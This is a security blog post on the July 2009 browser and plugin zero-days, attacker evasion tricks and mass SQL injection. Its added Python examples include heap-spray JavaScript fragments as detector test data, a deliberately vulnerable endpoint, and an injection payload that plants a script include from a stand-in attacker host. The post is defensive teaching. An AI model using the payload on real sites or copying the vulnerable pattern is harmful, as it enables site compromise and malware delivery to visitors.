A month of zero day(s)!


July proved to be quite an eventful month for security researchers! First came the 0-day in the Microsoft Video ActiveX control (the msvidctl DirectShow component) discussed here, then another 0-day in Office Web Components (OWC), followed by a 0-day in Firefox 3.5, and the month ended with a 0-day in Adobe Flash Player. Each of these vulnerabilities is being exploited in the wild right now, and switching from one browser to another is no longer a solution: the ActiveX bugs hit Internet Explorer, the Firefox bug hits Firefox, and Flash runs in all of them. Instead, users should apply every workaround the vendors suggest and update their systems as soon as a fix is out for the affected component.

From a researcher's point of view, it is interesting to see how quickly attackers adopt new ways of making sure their exploits run unnoticed and stay alive, to take advantage of the window between advisory and fix and of users who don't update their systems right away. When we first started following the msVidCtl (DirectShow) exploit, it looked like a fairly typical heap-spray-and-shellcode attack served as a JavaScript include. Soon, however, attackers began serving the JavaScript under a .jpg filename with an image Content-Type: the browser executes whatever a script tag references regardless of what the server calls it, so a scanner that only looked at responses with script extensions or script MIME types had no chance of catching it. Next, they split the exploit JavaScript across several smaller includes, so that no single file contains enough of the exploit to identify it; only the assembled sequence does. The various obfuscation techniques used to hide JavaScript have become so common that they probably deserve their own post, maybe next time. We saw the same techniques in the OWC exploits, and it would not be a surprise to see them with the Firefox or Flash exploits.
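The two evasion tricks above, content-type lying and fragmentation, both defeat a scanner that trusts the server's labels and judges files one at a time. The following is an added example, not code from the original post or from any scanner it mentions: it sniffs each response body for JavaScript regardless of extension or Content-Type, then scores heap-spray indicators per file and again over the reassembled script stream. The HTTP responses are constructed sample data, the CLSID in the last fragment is a dummy placeholder, and the regular-expression heuristics are illustrative rather than a complete signature set.

```python
"""Content sniffing and fragment reassembly for disguised exploit JavaScript.

Added example, not code from the original post.  It models the two evasion
tricks described above: exploit script served under a .jpg name with an image
Content-Type, and the exploit split across several small includes so that no
single file looks malicious.  The HTTP responses below are constructed sample
data and the heuristics are deliberately simple; a production scanner would
use a real JavaScript tokenizer and many more indicators.
"""
import re

# Constructed responses: (URL, declared Content-Type, response body).
RESPONSES = [
    ("http://site.invalid/logo.jpg", "image/jpeg",
     b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01"),                        # genuine JPEG header
    ("http://site.invalid/a.jpg", "image/jpeg",
     b"var s=unescape('%u9090%u9090%u0c0c%u0c0c');"),                 # sled, disguised as a JPEG
    ("http://site.invalid/b.jpg", "image/jpeg",
     b"var h=new Array();for(var i=0;i<200;i++){h[i]=s+s;}"),        # spray loop, separate file
    ("http://site.invalid/c.js", "application/javascript",
     b"var o=document.createElement('object');"
     b"o.setAttribute('classid','clsid:00000000-0000-0000-0000-000000000000');"),  # dummy CLSID
]

JPEG_MAGIC = b"\xff\xd8\xff"
JS_TOKENS = re.compile(rb"\b(?:var|function|eval|unescape|document|window)\b")
UNICODE_SLED = re.compile(rb"unescape\(['\"](?:%u[0-9a-fA-F]{4}){2,}")
FILL_LOOP = re.compile(rb"for\s*\([^)]*\)\s*\{[^}]*\[[^\]]*\]\s*=")
ACTIVEX_CLSID = re.compile(rb"classid['\"]?\s*[=,]\s*['\"]?clsid:", re.I)


def sniff_is_script(declared_type: str, body: bytes) -> bool:
    """Classify by content, not by extension or the server's Content-Type."""
    if declared_type.startswith("image/") and body.startswith(JPEG_MAGIC):
        return False
    return len(JS_TOKENS.findall(body)) >= 2


def mislabeled_scripts(responses):
    """URLs that claim to be images but carry JavaScript."""
    return [url for url, ctype, body in responses
            if ctype.startswith("image/") and sniff_is_script(ctype, body)]


def spray_indicators(script: bytes) -> set:
    """Heap-spray / ActiveX-instantiation indicators present in one script body."""
    found = set()
    if UNICODE_SLED.search(script):
        found.add("unicode_sled")
    if FILL_LOOP.search(script):
        found.add("array_fill_loop")
    if ACTIVEX_CLSID.search(script):
        found.add("activex_instantiation")
    return found


def heap_spray_suspected(indicators: set) -> bool:
    """A sled alone or a loop alone is common in benign code; both together is the signature."""
    return {"unicode_sled", "array_fill_loop"} <= indicators


def analyze(responses):
    """Per-file verdicts versus the verdict on the reassembled script stream."""
    per_file = {}
    fragments = []
    for url, ctype, body in responses:
        if sniff_is_script(ctype, body):
            per_file[url] = spray_indicators(body)
            fragments.append(body)
    # Includes execute in one page context, so judge them as one program.
    combined = spray_indicators(b"\n".join(fragments))
    return per_file, combined


if __name__ == "__main__":
    per_file, combined = analyze(RESPONSES)
    print("mislabeled:", mislabeled_scripts(RESPONSES))
    for url, ind in per_file.items():
        print(url, sorted(ind), "spray?", heap_spray_suspected(ind))
    print("combined", sorted(combined), "spray?", heap_spray_suspected(combined))
```

Run stand-alone, the per-file pass flags only one indicator in each of a.jpg and b.jpg, so neither file alone is judged a heap spray; the reassembled stream carries the sled, the fill loop and the ActiveX instantiation together, which is the verdict a scanner working one file at a time never reaches.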

Another point worth noticing across all these exploits is the transport mechanism. In most cases the attackers try to lure users to a site hosting the exploit. Thanks to diligent work by security researchers, however, it is getting harder to keep a dedicated malware-serving site up for long before it is block-listed. So what does an attacker do? Find a reputable site to host the malware. Why would a legitimate site host malware? Not knowingly, but the bad stuff gets in through a door the site owners don't know about. Attackers are probing legitimate sites for holes such as SQL injection, not to steal data but to inject a script reference into the stored content, so that it is served back to every user who visits the site. One real-world attempt to serve OWC exploits this way is reported here, so this is not theory but happening now. One can only imagine how many other websites are ready to become victims of this kind of attack. If you run a site, make sure you do everything you can not to become an attacker's accomplice: parameterise your database queries, validate input, and encode stored content before it goes into a page.
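To make the injection-to-visitor path concrete, here is an added example (not code from the original post or from the site it reports on) using an in-memory SQLite database with a made-up news table. A view-counter endpoint builds its UPDATE by string formatting and executes the result with executescript(), which runs stacked statements the way the injectable ASP/MSSQL stacks hit by the 2008-2009 mass-injection campaigns did; the attacker uses that to append a script include to every stored article, which the site then renders to all its visitors. The attacker host, payload and table layout are constructed for this example. The fixed endpoint validates and binds the parameter, and the fixed renderer encodes stored content on output, which neutralises even a payload that is already in the database.

```python
"""SQL injection used to plant a script include, and the two fixes.

Added example, not code from the original post.  An in-memory SQLite database
with a made-up 'news' table stands in for a legitimate site.  The vulnerable
view-counter endpoint builds its UPDATE by string formatting and runs it with
executescript(), which executes stacked statements the way the injectable
ASP/MSSQL stacks hit by the 2008-2009 mass-injection campaigns did; the
attacker uses that to append a <script> include to every stored article, which
the site then serves to all its visitors.  Table, column names and the
attacker host are constructed for this example.
"""
import html
import sqlite3

# Constructed injection payload for the news_id query-string parameter.
ATTACKER_PAYLOAD = (
    "1; UPDATE news SET body = body || "
    "'<script src=\"http://attacker.invalid/x.js\"></script>'"
)


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER)")
    conn.execute("INSERT INTO news (title, body, views) VALUES ('Welcome', 'Hello readers', 0)")
    conn.commit()
    return conn


def vulnerable_record_view(conn, news_id: str) -> None:
    """news_id is taken straight from the URL; ';' lets the attacker add statements."""
    conn.executescript(f"UPDATE news SET views = views + 1 WHERE id = {news_id}")


def safe_record_view(conn, news_id: str) -> bool:
    """Validate the parameter, then bind it; the value can never become SQL."""
    if not news_id.isdigit():
        return False
    conn.execute("UPDATE news SET views = views + 1 WHERE id = ?", (int(news_id),))
    conn.commit()
    return True


def fetch_article(conn, news_id: int):
    return conn.execute("SELECT title, body, views FROM news WHERE id = ?", (news_id,)).fetchone()


def render_unescaped(conn, news_id: int) -> str:
    """Stored content dropped into the page as-is: any planted tag reaches the visitor."""
    title, body, _ = fetch_article(conn, news_id)
    return f"<h1>{title}</h1><p>{body}</p>"


def render_escaped(conn, news_id: int) -> str:
    """Output encoding: even content already planted in the database is inert."""
    title, body, _ = fetch_article(conn, news_id)
    return f"<h1>{html.escape(title)}</h1><p>{html.escape(body)}</p>"


def demo() -> dict:
    """Run the attack against the vulnerable endpoint and show both renderings."""
    conn = make_db()
    vulnerable_record_view(conn, ATTACKER_PAYLOAD)
    return {
        "stored_body": fetch_article(conn, 1)[1],
        "unescaped": render_unescaped(conn, 1),
        "escaped": render_escaped(conn, 1),
        "safe_rejects_payload": not safe_record_view(conn, ATTACKER_PAYLOAD),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Output encoding is the right defence for text the site stores as text; a site that deliberately stores HTML needs an allow-list sanitiser instead, and the parameterised query is what keeps the attacker from writing to the database in the first place.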

For now, users can set the kill bit for the vulnerable ActiveX controls as Microsoft suggests, both for OWC and for the Microsoft Video ActiveX control; the kill bit is a per-CLSID Compatibility Flags value of 0x400 under the Internet Explorer ActiveX Compatibility registry key, and it stops the browser from instantiating the control at all. Firefox 3.5 users should update to 3.5.1, the release Mozilla issued to fix the issue, and Adobe has released a fix for the Flash Player plugin.
